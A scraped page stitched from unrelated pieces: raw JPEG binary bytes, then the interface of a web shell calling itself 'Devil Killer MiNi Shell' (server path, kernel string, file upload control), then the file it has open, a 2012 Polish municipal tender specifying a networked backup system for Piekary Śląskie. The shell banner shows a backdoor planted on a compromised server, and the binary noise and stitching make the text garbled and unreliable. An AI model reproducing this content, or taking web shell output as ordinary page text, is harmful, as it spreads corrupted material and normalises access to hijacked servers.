JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120911/195165-N-2012.html

<p class="kh_header"><b>Piekary Śląskie: Dostawa sprzętu komputerowego</b><br>
<b>Numer ogłoszenia: 195165 - 2012; data zamieszczenia: 11.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta  Piekary Śląskie , ul. Bytomska 84, 41-940 Piekary Śląskie, woj. śląskie, tel. 032 3939337, faks (032) 287 22 69.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.piekary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu komputerowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa sprzętu komputerowego. Specyfikacja zamawianego sprzętu:   Sieciowy System Kopii Zapasowych

I.	Założenia ogólne:
    System:
1.	System kopii zapasowych ma opierać się o architekturę klient-serwer, z centralnym serwerem zarządzającym procesem backupu oraz klientami (agentami) instalowanymi na maszynach w sieci.
2.	System kopii zapasowych musi umożliwiać promocję każdego z klientów (niezależnie od wykorzystywanego systemu operacyjnego) zarejestrowanych w centralnym systemie backupu do funkcji serwera mediów, który może posłużyć do składowania backupu z innych klientów.
3.	Powyższa funkcja ma umożliwiać promocję klienta do funkcji serwera mediów  z wykorzystaniem dedykowanej funkcji interfejsu Web, w szczególności niedopuszczalne jest, aby konieczne było modyfikowanie plików konfiguracyjnych klienta oraz serwera a także konieczność zmian na samym kliencie.
4.	Funkcja serwera mediów ma umożliwiać wykorzystanie zarówno lokalnych zasobów dyskowych każdego z klientów, jak również napędu taśmowego oraz biblioteki taśmowej do nich podłączonych celem zapisania na nich backupu z pozostałych klientów.
5.	System kopii zapasowych ma mieć możliwość wykonywania backupu na dysk, na taśmę (z wykorzystaniem napędu taśmowego oraz biblioteki taśmowej) a także do chmury utworzonej z serwerów backupu zainstalowanych w zdalnych lokalizacjach.
6.	System backupu ma posiadać możliwość backupu 2TB (z możliwością rozbudowy).
7.	System ma być wyposażony w mechanizm deduplikacji, który pozwoli zaoszczędzić ilość miejsca na dysku poprzez wyszukiwanie bloków zapisanych na nośniku w poprzednim zadaniu backupu.
8.	System musi być wyposażony w licencję, która gwarantuje współpracę z bibliotekami taśmowymi z wbudowanymi mechanizmami robotyki, bez względu na liczbę kaset oraz napędów obsługiwanych przez daną bibliotekę.
9.	System ma mieć możliwość obsługi nielimitowanej ilości napędów i bibliotek taśmowych.
10.	System ma mieć możliwość autodetekcji dowolnego napędu taśmowego i biblioteki, która została do niego podłączona.
11.	Administrator ma mieć możliwość ręcznej definicji dowolnego napędu taśmowego i biblioteki wraz z informacjami dotyczącymi jego budowy.
12.	System ma być wyposażony w moduł zarządzania licencjami, gdzie poprzez interfejs Web, administrator ma możliwość dodawania dowolnej licencji.
13.	Moduł zarządzania licencjami ma mieć możliwość dodawania (rozbudowy) poszczególnych funkcjonalności oprogramowania bez konieczności uruchamiania ponownie żadnego z komponentów oprogramowania. Niedopuszczalna jest konieczność restartu jakichkolwiek usług wchodzących w skład oprogramowania oraz jakichkolwiek maszyn wchodzących w skład systemu kopii bezpieczeństwa (włączając w to maszyny z zainstalowaną aplikacją klienta).
14.	System backupu musi mieć możliwość obsługi nielimitowanej ilości klientów backupu, wliczając w to agentów systemu plików, agentów dla hypervisorów (VMware, Hyper-V)  oraz agentów backupu online następujących usług:
a)	MS SQL
b)	MySQL
c)	Postre SQL
d)	Oracle
e)	MS Exchange
f)	ActiveDirectory
g)	LDAP
      Centralny serwer backupu:
15.	Centralny serwer backupu ma zostać dostarczony w formie urządzenia dedykowanego wyłącznie do wykonywania kopii bezpieczeństwa danych i zarządzania systemem kopii bezpieczeństwa
16.	Oprogramowanie zainstalowane w urządzeniu powinno bazować na systemie który nie będzie wymagał od zamawiającego zakupu dodatkowych licencji
17.	System operacyjny w urządzeniu powinien być dostosowany przez producenta w taki sposób, aby nie wymagał od zamawiającego zarządzania, utrzymywania oraz aktualizacji wewnętrznych komponentów systemu
18.	Interfejs zarządzania serwerem backupu ma być dostępny poprzez przeglądarkę internetową.
19.	Funkcjonalność zarządzania systemem przez przeglądarkę ma być dostępna jako funkcja dodatkowa, system powinien oferować możliwość wyłączenia tej funkcji i zarządzanie systemem backupu w pełni poprzez środowisko tekstowe CLI, dostępne zarówno bezpośrednio po podłączeniu klawiatury myszy do urządzenia, jak również poprzez interfejs SSH i dedykowany port IPMI
20.	Interfejs systemu ma być dostępny przez przeglądarkę za pomocą protokołu HTTPS, tym samym cała komunikacja pomiędzy przeglądarką a systemem ma być szyfrowana.
21.	W domyślnej konfiguracji, interfejs dostępny przez przeglądarkę ma wykorzystywać porty TCP 80 oraz 443.
22.	Administrator ma mieć możliwość zdefiniowania dowolnego portu TCP, na którym nasłuchiwać będzie interfejs dostępny poprzez przeglądarkę.
23.	System ma umożliwiać utworzenie dowolnej ilości kont użytkowników.
24.	Użytkownicy w systemie muszą mieć możliwość przypisania roli odzwierciedlającej poziom uprawnień.
25.	W domyślnej konfiguracji, system ma oferować minimum 3 rodzaje kont użytkowników systemu:
a)	Administrator - może wykonywać wszystkie typy operacji w systemie w tym tworzyć, modyfikować oraz usuwać obiekty i konta użytkowników,
b)	Operator - może uruchamiać zadania backupu, ma dostęp z uprawnieniami tylko do odczytu do konfiguracji systemu,
c)	Użytkownik - nie może tworzyć, usuwać ani modyfikować jakichkolwiek obiektów w systemie, ma prawo jedynie do odtwarzania kopii zapasowych.
26.	Serwer backupu ma mieć możliwość połączenia z agentem zarówno za pomocą adresu IP jak również z wykorzystaniem nazwy DNS.
27.	Produkt ma posiadać możliwość replikacji danych pomiędzy wieloma serwerami backupu zlokalizowanymi w różnych, także odległych lokalizacjach za pośrednictwem sieci LAN oraz łącz WAN.
28.	Proces replikacji danych pomiędzy serwerami backupu ma mieć możliwość definiowania minimum takich właściwości jak: 
a)	dane przeznaczone do replikacji z dokładnością do pojedynczego zasobu dyskowego, 
b)	częstotliwość z jaką replikacja będzie się odbywać z dokładnością do minuty, momentu zakończenia replikacji (musi być możliwość zdefiniowania daty końcowej, wyłączenia daty końcowej - replikacja ciągła oraz zdefiniowania ilości wystąpień zadania replikacji, po których polityka przestanie być aktywna), 
c)	retencji z dokładnością do jednego dnia.
29.	Produkt ma posiadać możliwość replikacji danych pomiędzy lokalnymi zasobami dyskowymi, tym samym administrator ma mieć możliwość zwielokrotnienia tych samych danych na wielu zasobach dyskowych celem zabezpieczenia danych przed awarią pojedynczego zasobu dyskowego.
30.	Proces replikacji danych pomiędzy lokalnymi zasobami dyskowymi ma być wyzwalany na żądanie administratora. Administrator ma być w stanie określić przed rozpoczęciem replikacji: 
a)	źródłowy logiczny zbiór danych do replikacji (z dokładnością do pojedynczego pliku), 
b)	docelowy zasób dyskowy, na który dane mają zostać zreplikowane, 
c)	czas retencji dla danych replikowanych. 
d)	włączenie wyłączenie raportowania na e-mail o szczegółach wykonania zadania replikacji, 
e)	wyłączenie aktualizacji indeksu danych o dane zreplikowane 
f)	ustawienie limitu czasowego po przekroczeniu, którego proces replikacji zostanie zatrzymany.
31.	System ma umożliwiać rozbudowę o funkcjonalność szyfrowania backupu z wykorzystaniem przynajmniej takich algorytmów jak 3DES (z PCBC), Blowfish oraz AES256.
32.	Klucze szyfrujące nie mogą być zapisywane razem z danymi backupowanymi.
33.	Klucze mają być przechowywane na kliencie (agencie) a nie na centralnym serwerze backupu.
34.	Funkcjonalność szyfrowania danych ma zabezpieczać zarówno dane przesyłane przez sieć jak również dane zapisywane na centralnym serwerze backupu.
35.	Serwer backupu ma mieć możliwość definiowania parelizmu (maksymalnej wartości jednoczesnych operacji) dla zasobu dyskowego
36.	System ma oferować możliwość odtwarzania backupu z możliwością określenia:
a)	czy odtworzone mają być oryginalne prawa na plikach, 
b)	daty modyfikacji,
c)	ACL w systemie POSIX oraz atrybutów rozszerzonych Linux, 
d)	czy nadpisywać pliki, jeśli istnieją na docelowej maszynie, 
e)	czy nadpisywać pliki, jeśli są nowsze niż te, które znajdują się w backupie.
37.	Podczas odtwarzania, administrator ma ponadto mieć możliwość zdefiniowania systemu innego niż centralny system backupu, który będzie źródłem dla procesu odtwarzania.
38.	System ma oferować możliwość kompresji danych backupu przed przesłaniem ich poprzez sieć na backup serwer, możliwość ta ma istnieć jako opcja dla każdego z definiowanych zadań backupu.
39.	Algorytm kompresji wykorzystywany do kompresji backupu ma bazować na algorytmie LZ77, w szczególności niedopuszczalne jest stosowanie zamkniętych algorytmów kompresji danych.
40.	Centralny serwer backupu ma być wyposażony w mechanizm reindeksacji istniejących taśm z backupem. W przypadku uszkodzenia indeksu, funkcja ta musi mieć możliwość zaindeksowania taśm utworzonych zarówno na danym centralnym serwerze backupu, jak i na każdym innym centralnym serwerze backupu wchodzącym w skład środowiska backupu.
41.	Mechanizm reindeksacji taśm ma umożliwiać administratorowi określenie następujących właściwości procesu przed jego rozpoczęciem: 
a)	w przypadku znanych taśm: wybór źródłowej taśmy, wybór źródłowego napędu, wybór czy rozpocząć indeksację od momentu jej przerwania czy od początku nośnika, wybór czy wysunąć taśmę z napędu po zakończeniu procesu indeksacji oraz czy po zakończeniu procesu przesłać powiadomienie do administratora drogą elektroniczną z podsumowaniem procesu indeksacji,
b)	W przypadku nieznanych taśm: wybór źródłowego napędu, wybór puli taśmowej do podłączenia, wybór typu taśmy - produkt ma zawierać listę  predefiniowanych typów taśm (w tym minimum ma oferować taśmę typu NULL oraz FILE celem testowania poprawności konfiguracji), zdefiniowania czy w zadaniu użyta ma być biblioteka taśmowa (jeśli tak, administrator ma mieć opcję wskazania której biblioteki należy użyć podczas procesu reindeksacji oraz którego slotu tej biblioteki), wybór czy rozpocząć indeksację od momentu jej przerwania czy od początku nośnika, wybór czy wysunąć taśmę z napędu po zakończeniu procesu indeksacji oraz czy po zakończeniu procesu powiadomić administratora wiadomością e-mail z podsumowaniem procesu indeksacji.
42.	Centralny serwer backupu ma być wyposażony w mechanizm reindeksacji istniejących zasobów dyskowych z backupem w przypadku uszkodzenia indeksu. Funkcja ta ma mieć możliwość zaindeksowania dysków z danymi zarówno na danym centralnym serwerze backupu, jak i na każdym innym centralnym serwerze backupu wchodzącym w skład środowiska backupu.
43.	Mechanizm reindeksacji dysków ma umożliwiać administratorowi określenie takich właściwości procesu przed jego rozpoczęciem jak: 
a)	w przypadku znanych dysków: wybór źródłowego zasobu dyskowego, wybór czy rozpocząć indeksację od momentu jej przerwania czy od początku nośnika oraz czy po zakończeniu procesu przesłać powiadomienie do administratora drogą elektroniczną z podsumowaniem procesu indeksacji,
b)	w przypadku nieznanych dysków: wybór hosta należącego do systemu backupu, do którego podłączony jest zasób dyskowy, definicja nazwy dla nowo utworzonego zasobu dyskowego po indeksacji, wskazanie pełnej ścieżki do indeksowanych danych, zdefiniowanie wielkości wolumenu z dokładnością do 1 megabajta, wybór czy rozpocząć indeksację od momentu jej przerwania czy od początku nośnika oraz czy po zakończeniu procesu przesłać powiadomienie do administratora drogą elektroniczną z podsumowaniem procesu indeksacji.
44.	System ma być wyposażony w mechanizm weryfikacji taśm, który umożliwia test czy dane zapisane na taśmie mogą być poprawnie odczytane.
45.	Powyższa funkcjonalność ma umożliwiać administratorowi zdefiniowanie przed rozpoczęciem procesu weryfikacji minimum następujących elementów:
a)	wybór taśmy do weryfikacji, 
b)	wybór napędu, który posłuży do weryfikacji, 
c)	wybór czy wznowić weryfikację od momentu, w którym proces został przerwany, 
d)	wybór czy wysunąć taśmę z napędu po zakończeniu procesu weryfikacji 
e)	czy po zakończeniu procesu przesłać powiadomienie do administratora drogą elektroniczną z podsumowaniem procesu weryfikacji.
46.	System ma być wyposażony w mechanizm duplikacji taśm z zapisanymi na nich kopiami bezpieczeństwa, który umożliwi utworzenie dowolnej ilości kopii danej taśmy celem zabezpieczenia danych przed awarią lub zniszczeniem nośnika.
47.	Powyższa funkcjonalność ma umożliwiać administratorowi zdefiniowanie przed rozpoczęciem procesu duplikacji minimum następujących elementów: 
a)	wybór źródłowej taśmy z danymi do duplikacji,
b)	wybór napędu, w którym umieszczono źródłową taśmę, 
c)	wybór napędu, w którym umieszczono taśmę docelową, 
d)	możliwość wyboru czy podczas procesu będzie wykorzystywana biblioteka taśmowa (jeśli tak, to dodatkowo administrator ma mieć możliwość zdefiniowania, której biblioteki należy użyć podczas procesu oraz slotu w którym zainstalowano taśmę docelową),
e)	możliwość wymuszenia nadpisywania danych na taśmie docelowej,
f)	czy po zakończeniu procesu przesłać powiadomienie do administratora drogą elektroniczną z podsumowaniem procesu duplikacji.
48.	System ma być wyposażony w mechanizm nawigacji, który umożliwia przeglądanie przez przeglądarkę Web zawartości dysków twardych wszystkich klientów zarejestrowanych w centralnym serwerze backupu oraz dodatkowo jego własne dane. Dane mają być wyświetlane w formie drzewa katalogów z możliwością przeglądania ich zawartości.
49.	Powyższa funkcjonalność ma działać niezależnie od systemu operacyjnego klienta oraz serwera. W każdym przypadku administrator ma mieć możliwość przeglądania plików i katalogów oraz weryfikacji poprawności komunikacji pomiędzy klientem a serwerem.
50.	Mechanizm nawigacji ma oferować możliwość weryfikacji, czy na stacji poprawnie zainstalowano agenta do hot-backupu aplikacji (agent ma wówczas w drzewie przypisanym do danego klienta wyświetlać listę takich aplikacji).
51.	System ma być wyposażony w mechanizm automatycznego wykrywania urządzeń takich jak napędy i biblioteki taśmowe, które zostały podłączone do centralnego systemu backupu.

II.	Mechanizm deduplikacji danych:
1.	System ma być wyposażony w technologię deduplikacji danych.
2.	Deduplikacja ma działać w oparciu o technologię stałej długości bloku, przy czym długość ta zależna jest od wykrytego typu pliku. Niedopuszczalne jest stosowanie mechanizmów deduplikacji o zmiennej długości bloku lub o zawsze stałej długości, niezależnie od typu pliku.
3.	Deduplikacja ma działać w oparciu o mechanizm identyfikacji typu pliku i na tej podstawie, dobierać optymalną wielkość bloku. Program ma mieć wbudowaną bazę różnego typu plików wraz z odpowiadającymi im rozmiarami optymalnych długości bloku.
4.	Administrator ma mieć możliwość określenia jakie typy plików będą deduplikowane jaką długością bloku. Funkcjonalność ta ma dawać przynajmniej możliwość zdefiniowania następujących długości bloków w bajtach dla poszczególnych typów plików: 1024, 2048, 4096, 8192, 16384, 32768, 65536.
5.	Administrator ma mieć możliwość zdefiniowania (dla każdego z zadań backupu z osobna), czy deduplikacja będzie włączona czy nie oraz czy funkcja ta ma być realizowana na poziomie klienta (agenta) czy po stronie centralnego serwera backupu.
6.	Mechanizm deduplikacji ma mieć możliwość operacji na dowolnych danych, w tym minimum pliki, bazy danych, maszyny wirtualne, poczta MS Exchange, jak i na każdych innych danych.
7.	Mechanizm deduplikacji ma działać na dowolnym systemie operacyjnym klienta (agenta) w tym minimum na Windows, Linux, MacOS, FreeBSD, NetBSD, OpenBSD, Solaris.

III.	Mechanizm łańcuchowania D2D2T:
1.	Oprogramowanie ma być wyposażone w funkcję łańcuchowania backupu Disk-To-Disk-To-Tape (D2D2T).
2.	Funkcjonalność ta ma umożliwiać zdefiniowanie zadania backupu na dysk, które po zakończeniu automatycznie przeniesie dane na taśmę (za pośrednictwem napędu lub biblioteki taśmowej).
3.	Administrator ma mieć możliwość zdefiniowania odstępu czasu wyrażonego w minutach, które opóźni moment przenoszenia danych na taśmę w stosunku do momentu zakończenia zadania backupu na dysk. Czas ten ma być definiowany per zadanie backupu.
4.	Funkcjonalność łańcuchowania D2D2T ma być możliwa także dla backupów zaplanowanych z harmonogramu.
5.	Przy definiowaniu zadania backupu z uaktywnionym łańcuchowaniem D2D2T administrator ma mieć możliwość określenia polityki wykorzystywania taśm (użycie istniejących taśm do końca lub wykorzystanie nowych taśm), określenia retencji dla backupu na taśmie oraz możliwość włączenia szczegółowego raportowania na e-mail o statusie zadania.
6.	Administrator ma mieć możliwość zdefiniowania zautomatyzowanego mechanizmu D2D2T dla danych zapisanych na dysku, przy czym wyzwolenie zdarzenia łańcuchowania będzie związane minimum z: wielkością wykorzystywanego miejsca na wybranym zasobie dyskowym z dokładnością do 1MB, ilością pozostałego miejsca na zasobie dyskowym z dokładnością do 1MB.
7.	Administrator ma mieć także możliwość zdefiniowania kolejności z jaką dane będą zapisywane na taśmie, minimum jako: od najstarszych do najnowszych lub od najnowszych do najstarszych.
8.	Administrator ma mieć możliwość zdefiniowania czy po zakończeniu procesu łańcuchowania D2D2T dane na zasobie dyskowym mają być usunięte czy pozostawione.

IV.	Agenci do backupu:
1.	Agent do backupu środowiska wirtualnego VMware vSphere:
a)	 Agent backupu musi wspierać: 
- hot-backup (backup w czasie pracy) dla platformy wirtualizacyjnej VMware Infrastructure w wersjach ESX 3.0, 3.5, ESXi 3.x, Virtual Center 2.0, 2.5.
- Agent backupu ma wspierać hot-backup (backup w czasie pracy) dla platformy wirtualizacyjnej VMware vSphere  w wersjach ESXi 4.x, 5.0, ESX 4.x, vCenter 4.0, 4.1, 5.
- Agent backupu ma wspierać obsługę środowiska wirtualizacji vStorage na platformach CentOS 5, Red Hat Enterprise Linux 5, 6, SUSE Enterprise Server 10, 11, Windows Server 2003 SP2, Windows Server 2008 SP1 and R2, Windows Desktop: 7, Vista, XP SP3.
b)	Funkcjonalność agenta backupu ma umożliwiać backup zarówno zatrzymanych jak również pracujących maszyn wirtualnych bez konieczności instalacji agenta na każdej z tych maszyn (backup na poziomie hypervisora).
c)	Backup ma być możliwy zarówno dla całych obrazów maszyn wirtualnych, jak i na poziomie poszczególnych wykorzystanych bloków.
d)	Backup ma być realizowany jako backup pełny, jako backup przyrostowy i dyferencyjny na poziomie bloków.
e)	Agent backupu ma umożliwiać backup danych fizycznie zapisanych na wirtualnym dysku.
f)	Agent backupu ma zapewniać możliwość przywracania danych na poziomie poszczególnych plików oraz folderów w systemach Windows i Linux dla maszyn wirtualnych (możliwość wyodrębnienia dowolnego pliku plików oraz katalogu katalogów) z backupu obrazu maszyny wirtualnej.
g)	Przywracanie plików z maszyny wirtualnej ma być niezależne i możliwe bez konieczności użycia platformy VMware (ESX lub vCenter).
h)	Przywracanie maszyn wirtualnych ma być możliwe z przekierowaniem Hypervisora (zmiana miejsca docelowego dla odtwarzanego backupu) , jak również ma zapewnić możliwość wyboru data center, klastra lub hosta docelowego.
i)	Agent backupu ma pozwalać na wykonanie backupu na poziomie bloków przy wsparciu technologi Raw Device Mapping (RDM) wraz z mechanizmem Changed Block Tracking (CBT).
j)	Agent backupu powinien integrować się z oprogramowaniem vCenter pozwalając na zarządzanie backupem na kilku hostach fizycznych.
k)	Agent backupu ma wspierać rozwiązanie vApp, zapewniając backup grupy wspólnie pracujących maszyn.
l)	System ma zapewniać zarządzanie zadaniami backupu i przywracania dla platformy wirtualnej z poziomu przeglądarki internetowej.
m)	System ma wspierać wiele mechanizmów transportu, w szczególności system ma wspierać backup maszyn wirtualnych bez konieczności użycia sieci LAN (z wykorzystaniem sieci SAN), za pośrednictwem wirtualnej sieci LAN lub bezpośrednio na urządzenie podłączone za pośrednictwem interfejsu SCSI.
n)	System ma mieć możliwość uaktywnienia mechanizmu deduplikacji danych dla backupu maszyn wirtualnych.
o)	Funkcjonalność deduplikacji ma być możliwa zarówno na poziomie centralnego serwera backupu jak i po stronie backupowanej maszyny.  Funkcjonalność ta ma być definiowana (także włączana lub wyłączana) na poziomie pojedynczego zadania backupu.
p)	System ma mieć możliwość uaktywnienia kompresji danych dla backupu maszyn wirtualnych.
q)	Administrator ma mieć możliwość wyboru pomiędzy przynajmniej dwoma algorytmami kompresji, przy czym produkt ma umożliwiać wybór minimum algorytmów LZRW1 oraz LZRW3-A.
2.	Agent do backupu środowiska wirtualnego Microsoft Hyper-V:

a)	Agent backupu ma wspierać hot-backup (backup w czasie pracy) dla platformy wirtualizacyjnej Microsoft Hyper-V w wersjach Windows Server 2008 oraz Windows Server 2008 R2.
b)	Backup ma być możliwy zarówno dla całych obrazów maszyn wirtualnych, jak i na poziomie poszczególnych wykorzystanych bloków.
c)	Backup ma być realizowany jako backup pełny oraz backup inkrementacyjny z wykorzystaniem technologii śledzenia zmienionych bloków.
d)	Funkcjonalność agenta backupu ma umożliwiać backup zarówno zatrzymanych jak również pracujących maszyn wirtualnych bez konieczności instalacji agenta na każdej z tych maszyn (backup na poziomie hypervisora).
e)	Agent backupu ma umożliwiać backup tylko danych fizycznie zapisanych na wirtualnym dysku.
f)	Agent backupu ma zapewniać możliwość przywracania wszystkich maszyn wirtualnych lub pojedynczych, zdefiniowanych przed administratora maszyn.
g)	Przywracanie maszyn wirtualnych ma być niezależne. Proces przywracania nie ma wymagać od administratora wykorzystywania innych maszyn niż centralnego serwera backupu oraz docelowego hosta Hyper-V, na którym maszyny zostaną odtworzone.
h)	Przywracanie maszyn wirtualnych ma być możliwe z przekierowaniem hypervisora (zmiana miejsca docelowego dla odtwarzanego backupu) ze wskazaniem hosta docelowego.
i)	Agent backupu ma pozwalać na wykonanie backupu na poziomie bloków przy wsparciu mechanizmu Changed Block Tracking (CBT).
j)	System ma zapewniać zarządzanie zadaniami backupu i przywracania dla platformy wirtualnej z poziomu przeglądarki internetowej.
k)	System ma wspierać wiele mechanizmów transportu, w szczególności system ma wspierać backup maszyn wirtualnych bez konieczności użycia sieci LAN (z wykorzystaniem sieci SAN), za pośrednictwem wirtualnej sieci LAN lub bezpośrednio na urządzenie podłączone za pośrednictwem interfejsu SCSI.
l)	System ma mieć możliwość uaktywnienia mechanizmu deduplikacji danych dla backupu maszyn wirtualnych.
m)	Funkcjonalność deduplikacji ma być możliwa zarówno na poziomie centralnego serwera backupu jak i po stronie backupowanej maszyny. Funkcjonalność ta ma być definiowana (także włączana lub wyłączana) na poziomie pojedynczego zadania backupu.
n)	System ma mieć możliwość uaktywnienia kompresji danych dla backupu maszyn wirtualnych.
o)	System ma umożliwiać hot-backup aplikacji pracujących na maszynach wirtualnych z wykorzystaniem technologii VSS po stronie hypervisora bez konieczności instalacji agentów na każdej z maszyn wirtualnych.
p)	Powyższa funkcjonalność ma umożliwiać hot-backup przynajmniej takich aplikacji jak: Mictosoft Exchange, Microsoft SQL Server, Microsoft Sharepoint oraz bazy danych Oracle.
q)	System ma umożliwiać eksport pliku VHD z przeprowadzonego backupu na maszynę z systemem Windows 7 lub Windows 2008 celem zamontowania pliku obrazu i odzyskania poszczególnych plików z obrazu maszyny wirtualnej.
r)	Administrator ma mieć możliwość wyboru pomiędzy przynajmniej dwoma algorytmami kompresji, przy czym produkt ma umożliwiać wybór minimum algorytmów LZRW1 oraz LZRW3-A.

3.	Agent do backupu środowiska wirtualnego Xen oraz Citrix XenServer:

a)	Agent backupu ma wspierać hot-backup (backup w czasie pracy) dla platform wirtualizacyjnych Xen oraz Citrix XenServer w wersjach 5.5 i wyższych.
b)	Backup maszyn wirtualnych bez konieczności instalacji agenta na każdej z pracujących maszyn (backup na poziomie hypervisora).
c)	Backup ma być realizowany jako backup pełny z uwzględnieniem wszystkich maszyn wirtualnych, zarówno pracujących jak również zatrzymanych.
d)	Agent backupu ma zapewniać możliwość przywracania wszystkich maszyn wirtualnych  lub pojedynczych, zdefiniowanych przed administratora maszyn.
e)	Przywracanie maszyn wirtualnych ma być niezależne. Proces przywracania nie ma wymagać od administratora wykorzystywania innych maszyn niż centralnego serwera backupu oraz docelowego hosta Xen XenServer na którym maszyny zostaną odtworzone.
